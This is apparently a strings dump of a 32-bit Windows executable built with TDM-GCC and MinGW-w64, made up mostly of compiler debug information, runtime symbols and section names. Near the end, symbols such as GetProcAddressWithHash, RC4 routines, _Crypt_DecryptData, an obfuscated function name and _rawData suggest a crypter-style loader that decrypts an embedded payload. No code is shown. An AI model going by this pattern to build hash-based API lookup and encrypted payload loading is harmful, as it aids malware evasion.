h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/tlsmcrt.c
_CRT_MT
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/tlsthrd.c
size_t
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
WINBOOL
DWORD
float
LPVOID
signed char
short int
long long unsigned int
ULONG_PTR
HANDLE
_LIST_ENTRY
Flink
Blink
LIST_ENTRY
_RTL_CRITICAL_SECTION_DEBUG
CreatorBackTraceIndex
CriticalSection
ProcessLocksList
EntryCount
ContentionCount
Flags
CreatorBackTraceIndexHigh
SpareWORD
_RTL_CRITICAL_SECTION
DebugInfo
LockCount
RecursionCount
OwningThread
LockSemaphore
SpinCount
PRTL_CRITICAL_SECTION_DEBUG
RTL_CRITICAL_SECTION
CRITICAL_SECTION
double
long double
__mingwthr_key_t
__mingwthr_key
__mingwthr_run_key_dtors
value
___w64_mingwthr_add_key_dtor
new_key
___w64_mingwthr_remove_key_dtor
prev_key
cur_key
__mingw_TLScallback
hDllHandle
reason
reserved
__mingwthr_cs
__mingwthr_cs_init
key_dtor_list
calloc
!free
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/pseudo-reloc-list.c
__RUNTIME_PSEUDO_RELOC_LIST_END__
__RUNTIME_PSEUDO_RELOC_LIST__
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt/pesect.c
size_t
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
WINBOOL
DWORD
float
PBYTE
LPVOID
signed char
short int
long long unsigned int
LONG_PTR
ULONG_PTR
DWORD_PTR
_IMAGE_DOS_HEADER
e_magic
e_cblp
e_crlc
e_cparhdr
e_minalloc
e_maxalloc
e_csum
e_lfarlc
e_ovno
e_res
e_oemid
e_oeminfo
e_res2
e_lfanew
IMAGE_DOS_HEADER
PIMAGE_DOS_HEADER
_IMAGE_FILE_HEADER
Machine
NumberOfSections
PointerToSymbolTable
NumberOfSymbols
SizeOfOptionalHeader
IMAGE_FILE_HEADER
_IMAGE_DATA_DIRECTORY
IMAGE_DATA_DIRECTORY
_IMAGE_OPTIONAL_HEADER
Magic
MajorLinkerVersion
MinorLinkerVersion
SizeOfCode
SizeOfInitializedData
SizeOfUninitializedData
AddressOfEntryPoint
BaseOfCode
BaseOfData
ImageBase
SectionAlignment
FileAlignment
MajorOperatingSystemVersion
MinorOperatingSystemVersion
MajorImageVersion
MinorImageVersion
MajorSubsystemVersion
MinorSubsystemVersion
Win32VersionValue
SizeOfImage
SizeOfHeaders
CheckSum
Subsystem
DllCharacteristics
SizeOfStackReserve
SizeOfStackCommit
SizeOfHeapReserve
SizeOfHeapCommit
LoaderFlags
NumberOfRvaAndSizes
DataDirectory
IMAGE_OPTIONAL_HEADER32
PIMAGE_OPTIONAL_HEADER32
PIMAGE_OPTIONAL_HEADER
_IMAGE_NT_HEADERS
Signature
FileHeader
OptionalHeader
IMAGE_NT_HEADERS32
PIMAGE_NT_HEADERS32
IMAGE_NT_HEADERS
PIMAGE_NT_HEADERS
PhysicalAddress
VirtualSize
_IMAGE_SECTION_HEADER
SizeOfRawData
PointerToRawData
PointerToRelocations
PointerToLinenumbers
NumberOfRelocations
NumberOfLinenumbers
PIMAGE_SECTION_HEADER
OriginalFirstThunk
_IMAGE_IMPORT_DESCRIPTOR
ForwarderChain
FirstThunk
IMAGE_IMPORT_DESCRIPTOR
PIMAGE_IMPORT_DESCRIPTOR
double
long double
_ValidateImageBase
pDOSHeader
pOptHeader
_FindPESection
_FindPESectionByName
pName
__mingw_GetSectionForAddress
__mingw_GetSectionCount
_FindPESectionExec
_GetPEImageBase
_IsNonwritableInCurrentImage
pTarget
&rvaTarget
__mingw_enum_import_library_names
&importDesc
&importsStartRVA
)_image_base__
*strlen
,strncmp
../../../../../../src/gcc-4.8.1/libgcc/config/i386/cygwin.S
c:\crossdev\gccmaster\build-tdm64\gcc\x86_64-w64-mingw32\32\libgcc
GNU AS 2.23.2
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -O2 -O2 -fbuilding-libgcc -fno-stack-protector -fexceptions
../../../../../../src/gcc-4.8.1/libgcc/unwind-sjlj.c
c:\crossdev\gccmaster\build-tdm64\gcc\x86_64-w64-mingw32\32\libgcc
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
double
float
long double
short int
ix86_tune_indices
X86_TUNE_USE_LEAVE
X86_TUNE_PUSH_MEMORY
X86_TUNE_ZERO_EXTEND_WITH_AND
X86_TUNE_UNROLL_STRLEN
X86_TUNE_BRANCH_PREDICTION_HINTS
X86_TUNE_DOUBLE_WITH_ADD
X86_TUNE_USE_SAHF
X86_TUNE_MOVX
X86_TUNE_PARTIAL_REG_STALL
X86_TUNE_PARTIAL_FLAG_REG_STALL
X86_TUNE_LCP_STALL
X86_TUNE_USE_HIMODE_FIOP
X86_TUNE_USE_SIMODE_FIOP
X86_TUNE_USE_MOV0
X86_TUNE_USE_CLTD
X86_TUNE_USE_XCHGB
X86_TUNE_SPLIT_LONG_MOVES
X86_TUNE_READ_MODIFY_WRITE
X86_TUNE_READ_MODIFY
X86_TUNE_PROMOTE_QIMODE
X86_TUNE_FAST_PREFIX
X86_TUNE_SINGLE_STRINGOP
X86_TUNE_QIMODE_MATH
X86_TUNE_HIMODE_MATH
X86_TUNE_PROMOTE_QI_REGS
X86_TUNE_PROMOTE_HI_REGS
X86_TUNE_SINGLE_POP
X86_TUNE_DOUBLE_POP
X86_TUNE_SINGLE_PUSH
X86_TUNE_DOUBLE_PUSH
X86_TUNE_INTEGER_DFMODE_MOVES
X86_TUNE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_SSE_UNALIGNED_STORE_OPTIMAL
X86_TUNE_SSE_PACKED_SINGLE_INSN_OPTIMAL
X86_TUNE_SSE_SPLIT_REGS
X86_TUNE_SSE_TYPELESS_STORES
X86_TUNE_SSE_LOAD0_BY_PXOR
X86_TUNE_MEMORY_MISMATCH_STALL
X86_TUNE_PROLOGUE_USING_MOVE
X86_TUNE_EPILOGUE_USING_MOVE
X86_TUNE_SHIFT1
X86_TUNE_USE_FFREEP
X86_TUNE_INTER_UNIT_MOVES
X86_TUNE_INTER_UNIT_CONVERSIONS
X86_TUNE_FOUR_JUMP_LIMIT
X86_TUNE_SCHEDULE
X86_TUNE_USE_BT
X86_TUNE_USE_INCDEC
X86_TUNE_PAD_RETURNS
X86_TUNE_PAD_SHORT_FUNCTION
X86_TUNE_EXT_80387_CONSTANTS
X86_TUNE_AVOID_VECTOR_DECODE
X86_TUNE_PROMOTE_HIMODE_IMUL
X86_TUNE_SLOW_IMUL_IMM32_MEM
X86_TUNE_SLOW_IMUL_IMM8
X86_TUNE_MOVE_M1_VIA_OR
X86_TUNE_NOT_UNPAIRABLE
X86_TUNE_NOT_VECTORMODE
X86_TUNE_USE_VECTOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_CONVERTS
X86_TUNE_FUSE_CMP_AND_BRANCH
X86_TUNE_OPT_AGU
X86_TUNE_VECTORIZE_DOUBLE
X86_TUNE_SOFTWARE_PREFETCHING_BENEFICIAL
X86_TUNE_AVX128_OPTIMAL
X86_TUNE_REASSOC_INT_TO_PARALLEL
X86_TUNE_REASSOC_FP_TO_PARALLEL
X86_TUNE_GENERAL_REGS_SSE_SPILL
X86_TUNE_AVOID_MEM_OPND_FOR_CMOVE
X86_TUNE_LAST
ix86_arch_indices
X86_ARCH_CMOV
X86_ARCH_CMPXCHG
X86_ARCH_CMPXCHG8B
X86_ARCH_XADD
X86_ARCH_BSWAP
X86_ARCH_LAST
_Unwind_Word
_Unwind_Ptr
_Unwind_Exception_Class
long long unsigned int
_URC_NO_REASON
_URC_FOREIGN_EXCEPTION_CAUGHT
_URC_FATAL_PHASE2_ERROR
_URC_FATAL_PHASE1_ERROR
_URC_NORMAL_STOP
_URC_END_OF_STACK
_URC_HANDLER_FOUND
_URC_INSTALL_CONTEXT
_URC_CONTINUE_UNWIND
_Unwind_Reason_Code
_Unwind_Exception_Cleanup_Fn
_Unwind_Exception
exception_class
exception_cleanup
private_1
private_2
_Unwind_Action
_Unwind_Stop_Fn
_Unwind_Context
_Unwind_Trace_Fn
_Unwind_Personality_Fn
pthread_once_t
pthread_key_t
__gthread_key_t
__gthread_once_t
SjLj_Function_Context
call_site
_Unwind_FrameState
uw_update_context
__gthread_active_p
uw_frame_state_for
uw_identify_context
__shmem_grabber_use_fc_key
__shmem_grabber_fc_key
__gthread_key_create
__key
__dtor
__shmem_grabber_sjlj_once
__gthread_once
__once
__func
fc_key_init_once
__gthread_setspecific
__key
__ptr
__shmem_grabber_fc_static
_Unwind_SjLj_SetContext
uw_install_context
current
target
__gthread_getspecific
__key
_Unwind_SjLj_Unregister
uw_advance_context
uw_init_context
__shmem_init_use_fc_key
"temp
__shmem_init_sjlj_once
#temp
$fc_key_init
*_Unwind_RaiseException_Phase2
/match_handler
*_Unwind_ForcedUnwind_Phase2
/stop
/stop_code
/action
_Unwind_SjLj_Register
<_Unwind_GetGR
!index
<_Unwind_GetCFA
_Unwind_SetGR
!index
<_Unwind_GetIP
<_Unwind_GetIPInfo
!ip_before_insn
_Unwind_SetIP
<_Unwind_GetLanguageSpecificData
<_Unwind_GetRegionStart
<_Unwind_FindEnclosingFunction
>_Unwind_GetDataRelBase
>_Unwind_GetTextRelBase
@_Unwind_SjLj_GetContext
<_Unwind_SjLj_RaiseException
<_Unwind_SjLj_ForcedUnwind
!stop
_Unwind_SjLj_Resume
<_Unwind_SjLj_Resume_or_Rethrow
E_Unwind_DeleteException
>_Unwind_Backtrace
Ftrace
Ftrace_argument
J__shmem_ptr_fc_static
J__shmem_ptr_fc_key
J__shmem_ptr_use_fc_key
J__shmem_ptr_sjlj_once
Kpthread_key_create
L__shmem_grab
Mabort
Kpthread_once
Kpthread_setspecific
Npthread_getspecific
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -O2 -O2 -fbuilding-libgcc -fno-stack-protector -fno-exceptions
../../../../../../src/gcc-4.8.1/libgcc/../libgcc/config/i386/shmem-win32.c
c:\crossdev\gccmaster\build-tdm64\gcc\x86_64-w64-mingw32\32\libgcc
size_t
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
DWORD
float
signed char
short int
long long unsigned int
HANDLE
__w32sp_trap
get_ptr_from_atom
name_buf
name_buf_len
ptr_offset
ptr_len
__shmem_grab
initfunc
prefix_len
name_len
ptr_len
full_atom_name
hmutex
shared_mem
shmem_version_prefix
malloc
free
!memset
strlen
"memcpy
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -O2 -O2 -fbuilding-libgcc -fno-stack-protector
../../../../../../src/gcc-4.8.1/libgcc/libgcc2.c
c:\crossdev\gccmaster\build-tdm64\gcc\x86_64-w64-mingw32\32\libgcc
unsigned int
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
double
float
long double
short int
ix86_tune_indices
X86_TUNE_USE_LEAVE
X86_TUNE_PUSH_MEMORY
X86_TUNE_ZERO_EXTEND_WITH_AND
X86_TUNE_UNROLL_STRLEN
X86_TUNE_BRANCH_PREDICTION_HINTS
X86_TUNE_DOUBLE_WITH_ADD
X86_TUNE_USE_SAHF
X86_TUNE_MOVX
X86_TUNE_PARTIAL_REG_STALL
X86_TUNE_PARTIAL_FLAG_REG_STALL
X86_TUNE_LCP_STALL
X86_TUNE_USE_HIMODE_FIOP
X86_TUNE_USE_SIMODE_FIOP
X86_TUNE_USE_MOV0
X86_TUNE_USE_CLTD
X86_TUNE_USE_XCHGB
X86_TUNE_SPLIT_LONG_MOVES
X86_TUNE_READ_MODIFY_WRITE
X86_TUNE_READ_MODIFY
X86_TUNE_PROMOTE_QIMODE
X86_TUNE_FAST_PREFIX
X86_TUNE_SINGLE_STRINGOP
X86_TUNE_QIMODE_MATH
X86_TUNE_HIMODE_MATH
X86_TUNE_PROMOTE_QI_REGS
X86_TUNE_PROMOTE_HI_REGS
X86_TUNE_SINGLE_POP
X86_TUNE_DOUBLE_POP
X86_TUNE_SINGLE_PUSH
X86_TUNE_DOUBLE_PUSH
X86_TUNE_INTEGER_DFMODE_MOVES
X86_TUNE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_SSE_UNALIGNED_STORE_OPTIMAL
X86_TUNE_SSE_PACKED_SINGLE_INSN_OPTIMAL
X86_TUNE_SSE_SPLIT_REGS
X86_TUNE_SSE_TYPELESS_STORES
X86_TUNE_SSE_LOAD0_BY_PXOR
X86_TUNE_MEMORY_MISMATCH_STALL
X86_TUNE_PROLOGUE_USING_MOVE
X86_TUNE_EPILOGUE_USING_MOVE
X86_TUNE_SHIFT1
X86_TUNE_USE_FFREEP
X86_TUNE_INTER_UNIT_MOVES
X86_TUNE_INTER_UNIT_CONVERSIONS
X86_TUNE_FOUR_JUMP_LIMIT
X86_TUNE_SCHEDULE
X86_TUNE_USE_BT
X86_TUNE_USE_INCDEC
X86_TUNE_PAD_RETURNS
X86_TUNE_PAD_SHORT_FUNCTION
X86_TUNE_EXT_80387_CONSTANTS
X86_TUNE_AVOID_VECTOR_DECODE
X86_TUNE_PROMOTE_HIMODE_IMUL
X86_TUNE_SLOW_IMUL_IMM32_MEM
X86_TUNE_SLOW_IMUL_IMM8
X86_TUNE_MOVE_M1_VIA_OR
X86_TUNE_NOT_UNPAIRABLE
X86_TUNE_NOT_VECTORMODE
X86_TUNE_USE_VECTOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_CONVERTS
X86_TUNE_FUSE_CMP_AND_BRANCH
X86_TUNE_OPT_AGU
X86_TUNE_VECTORIZE_DOUBLE
X86_TUNE_SOFTWARE_PREFETCHING_BENEFICIAL
X86_TUNE_AVX128_OPTIMAL
X86_TUNE_REASSOC_INT_TO_PARALLEL
X86_TUNE_REASSOC_FP_TO_PARALLEL
X86_TUNE_GENERAL_REGS_SSE_SPILL
X86_TUNE_AVOID_MEM_OPND_FOR_CMOVE
X86_TUNE_LAST
ix86_arch_indices
X86_ARCH_CMOV
X86_ARCH_CMPXCHG
X86_ARCH_CMPXCHG8B
X86_ARCH_XADD
X86_ARCH_BSWAP
X86_ARCH_LAST
signed char
long long unsigned int
complex float
complex double
complex long double
__float128
__unknown__
func_ptr
__CTOR_LIST__
__DTOR_LIST__
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc/mingw_matherr.c
_MINGW_INSTALL_DEBUG_MATHERR
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc/invalid_parameter_handler.c
unsigned int
uintptr_t
wchar_t
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
LONG_PTR
PVOID
PLONG
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
mingw_get_invalid_parameter_handler
mingw_set_invalid_parameter_handler
new_handler
handler
_imp___set_invalid_parameter_handler
_imp___get_invalid_parameter_handler
mingw_getsp.S
h:\crossdev\gccmaster\build-tdm64\runtime\mingw-w64-crt
GNU AS 2.23.2
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include/psdk_inc
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
crtexe.c
intrin-impl.h
_mingw.h
winnt.h
minwindef.h
basetsd.h
errhandlingapi.h
processthreadsapi.h
stdlib.h
combaseapi.h
wtypes.h
internal.h
math.h
tchar.h
ctype.h
string.h
process.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
tlssup.c
_mingw.h
minwindef.h
basetsd.h
winnt.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
charmax.c
combaseapi.h
wtypes.h
internal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
mingw_helpers.c
combaseapi.h
wtypes.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
xtxtmode.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
atonexit.c
combaseapi.h
wtypes.h
stdlib.h
internal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
_newmode.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
wildcard.c
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
combaseapi.h
wtypes.h
natstart.c
internal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
crt_handler.c
winnt.h
minwindef.h
basetsd.h
errhandlingapi.h
combaseapi.h
wtypes.h
signal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
cinitexe.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
dllargv.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
merr.c
combaseapi.h
wtypes.h
internal.h
math.h
stdio.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
pseudo-reloc.c
vadefs.h
_mingw.h
minwindef.h
basetsd.h
winnt.h
combaseapi.h
wtypes.h
stdio.h
<built-in>
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
CRT_fp10.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
gccmain.c
combaseapi.h
wtypes.h
_mingw.h
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
crt0_c.c
minwindef.h
winnt.h
winbase.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
gs_support.c
winnt.h
minwindef.h
basetsd.h
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
tlsmcrt.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
tlsthrd.c
_mingw.h
minwindef.h
basetsd.h
winnt.h
minwinbase.h
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
pseudo-reloc-list.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
pesect.c
_mingw.h
minwindef.h
basetsd.h
winnt.h
string.h
../../../../../../src/gcc-4.8.1/libgcc/config/i386
cygwin.S
../../../../../../src/gcc-4.8.1/libgcc
../../../../../../src/gcc-4.8.1/libgcc/../gcc/config/i386
c:/mingw64tdm/x86_64-w64-mingw32/include
unwind-sjlj.c
./gthr-default.h
unwind.inc
i386.h
./unwind.h
pthread.h
shmem.h
stdlib.h
O-=eK\
../../../../../../src/gcc-4.8.1/libgcc/../libgcc/config/i386
c:/mingw64tdm/x86_64-w64-mingw32/include
shmem-win32.c
_mingw.h
minwindef.h
winnt.h
malloc.h
string.h
../../../../../../src/gcc-4.8.1/libgcc/../gcc/config/i386
../../../../../../src/gcc-4.8.1/libgcc
i386.h
libgcc2.c
gbl-ctors.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc
mingw_matherr.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
invalid_parameter_handler.c
_mingw.h
basetsd.h
winnt.h
combaseapi.h
wtypes.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc
mingw_getsp.S
mingw_getsp.S
Subsystem
CheckSum
SizeOfImage
BaseOfCode
SectionAlignment
MinorSubsystemVersion
DataDirectory
SizeOfStackCommit
ImageBase
SizeOfCode
MajorLinkerVersion
SizeOfHeapReserve
SizeOfInitializedData
SizeOfStackReserve
SizeOfHeapCommit
MinorLinkerVersion
__enative_startup_state
SizeOfUninitializedData
AddressOfEntryPoint
MajorSubsystemVersion
SizeOfHeaders
MajorOperatingSystemVersion
FileAlignment
NumberOfRvaAndSizes
ExceptionRecord
DllCharacteristics
MinorImageVersion
MinorOperatingSystemVersion
LoaderFlags
Win32VersionValue
MajorImageVersion
hDllHandle
lpreserved
dwReason
__enative_startup_state
ExceptionRecord
sSecInfo
ExceptionRecord
HighPart
pSection
TimeDateStamp
pNTHeader
Characteristics
pImageBase
VirtualAddress
iSection
stop_argument
cur_context
personality
this_context
context
.file
crtexe.c
_envp
_argv
_argc
_argret
.text
.data
.file
crtbegin.c
.text
.data
.file
source.cpp
.text
.data
.rdata
.file
eh_personality.cc
.text
.data
.rdata
.file
eh_exception.cc
.text
.data
.rdata
.file
class_type_info.cc
.text
.data
.file
.text
.data
.file
eh_call.cc
.text
.data
.file
eh_terminate.cc
.text
.data
.file
eh_catch.cc
.text
.data
.file
eh_globals.cc
.text
.data
.rdata
.file
eh_throw.cc
.text
.data
.file
eh_alloc.cc
.text
.data
.rdata
.ctors
.file
del_op.cc
__ZdlPv
.text
.data
.file
pure.cc
.text
.data
.rdata
.file
tinfo.cc
.text
.data
.file
eh_term_handler.cc
.text
.data
.rdata
.file
eh_unex_handler.cc
.text
.data
.rdata
.file
vterminate.cc
.text
.data
.rdata
.file
eh_type.cc
.text
.data
.file
cp-demangle.c
_d_name
_d_type
.text
.data
.rdata
.file
tlssup.c
___xd_a
___xd_z
.text
.data
.CRT$XLD$
.CRT$XLC
.rdata
.CRT$XDZ4
.CRT$XDA0
.CRT$XLZ,
.file
charmax.c
.text
.data
.file
mingw_helpers.c
.text
.data
.file
xtxtmode.c
.text
.data
.file
atonexit.c
_atexit
.text
.data
.file
_newmode.c
.text
.data
.file
wildcard.c
.text
.data
.file
natstart.c
.text
.data
.file
crt_handler.c
.text
.data
.file
cinitexe.c
.text
.data
.CRT$XCA
.file
dllargv.c
.text
.data
.file
merr.c
.text
.data
.rdata
.file
pseudo-reloc.c
.text
.data
.rdata
.file
CRT_fp10.c
.text
.data
.file
gccmain.c
___main
.text
.data
.file
crt0_c.c
_main
.text
.data
.file
gs_support.c
.text
.data
.rdata
.file
tlsmcrt.c
.text
.data
.file
tlsthrd.c
.text
.data
.file
.text
.data
.file
pesect.c
.text
.data
.file
.text
.data
.file
unwind-sjlj.c
.text
.data
.rdata
.file
shmem-win32.c
.text
.data
.file
libgcc2.c
.text
.data
.file
mingw_matherr.c
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.file
.text
.data
.text
.data
.text
.data
.text
.data
.idata$4
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$5
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.file
hname
fthunk
.text
.data
.idata$2P
.file
.text
.data
.file
thread.c
.text
.data
.rdata
.CRT$XLF(
.file
mutex.c
.text
.data
.rdata
.file
shmem.c
.text
.data
.file
spinlock.c
.text
.data
.rdata
.file
rwlock.c
.text
.data
.rdata
.file
misc.c
.text
.data
.file
cond.c
.text
.data
.rdata
.file
hname
fthunk
.text
.data
.idata$2(
.file
.text
.data
.file
hname
fthunk
.text
.data
.file
.text
.data
.file
hname
fthunk
.text
.data
.idata$2
.file
.text
.data
.file
hname
fthunk
.text
.data
.idata$2d
.file
.text
.data
.text
.data
.idata$4
.text
.data
.idata$5
.text
.data
.text
.data
.text
.data
.file
hname
fthunk
.text
.data
.idata$2<
.file
.text
.data
.file
mingw_getsp.S
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.file
crtend.c
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$7
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$7
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$7
.text
.data
.text
.data
.text
.data
.text
.data
.rdata
.rsrc
__cexit
___xi_a
_free
_strcmp
___xl_c
___xl_f
___xl_z
_fputc
_fputs
__ftime
__dll__
_fwrite
___xc_a
_memcpy
_memset
___xl_a
___xl_d
_fopen
_calloc
__fmode
__lock
___xc_z
__end__
_rawData
_signal
_malloc
_fclose
_memcmp
_abort
___xi_z
_write
_strlen
_exit
_printf
_Sleep@4
.debug_aranges
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_str
.debug_loc
.debug_ranges
___mingw_invalidParameterHandler
_pre_c_init
_managedapp
_pre_cpp_init
_startinfo
___tmainCRTStartup
_has_cctor
_WinMainCRTStartup
_mainCRTStartup
.CRT$XCAA
.CRT$XIAA
.debug_info
.debug_abbrev
.debug_loc
.debug_aranges
.debug_ranges
.debug_line
.debug_str
.rdata$zzz
.debug_frame
___readfsdword
__Z5crc32Ph
__Z11RC4_set_keyP10rc4_key_stiPKh
__Z3RC4P10rc4_key_stjPKhPh
__Z10encode_rc4PcmPw
__Z8_wstrlenPw
__Z22GetProcAddressWithHashm
__Z18_Crypt_DecryptDataPhmS_
__Z19xxDFadwetagcvFFbnMIv
__Z10WindowProcP6HWND__jjl@16
__Z14WndTestDlgProcP6HWND__jjl@16
__ZZ14WndTestDlgProcP6HWND__jjlE15BackgroundColor
__ZZ14WndTestDlgProcP6HWND__jjlE12CustomColors
__ZZ14WndTestDlgProcP6HWND__jjlE5Color
_WinMain@16
.gcc_except_table
__ZL12read_sleb128PKhPl
__ZL16get_adjusted_ptrPKSt9type_infoS1_PPv
__ZL28read_encoded_value_with_basehjPKhPj
__ZL15get_ttype_entryP16lsda_header_infom
__ZL20check_exception_specP16lsda_header_infoPKSt9type_infoPvl
__ZL21base_of_encoded_valuehP15_Unwind_Context
__ZL17parse_lsda_headerP15_Unwind_ContextPKhP16lsda_header_info
___gxx_personality_sj0
.rdata$_ZTIN10__cxxabiv115__forced_unwindE
.rdata$_ZTIN10__cxxabiv119__foreign_exceptionE
___cxa_call_unexpected
.rdata$_ZTISt13bad_exception
.rdata$_ZTSN10__cxxabiv115__forced_unwindE
.rdata$_ZTISt9exception
.rdata$_ZTSSt9exception
.rdata$_ZTSSt13bad_exception
.rdata$_ZTSN10__cxxabiv119__foreign_exceptionE
.text$_ZL12read_sleb128PKhPl
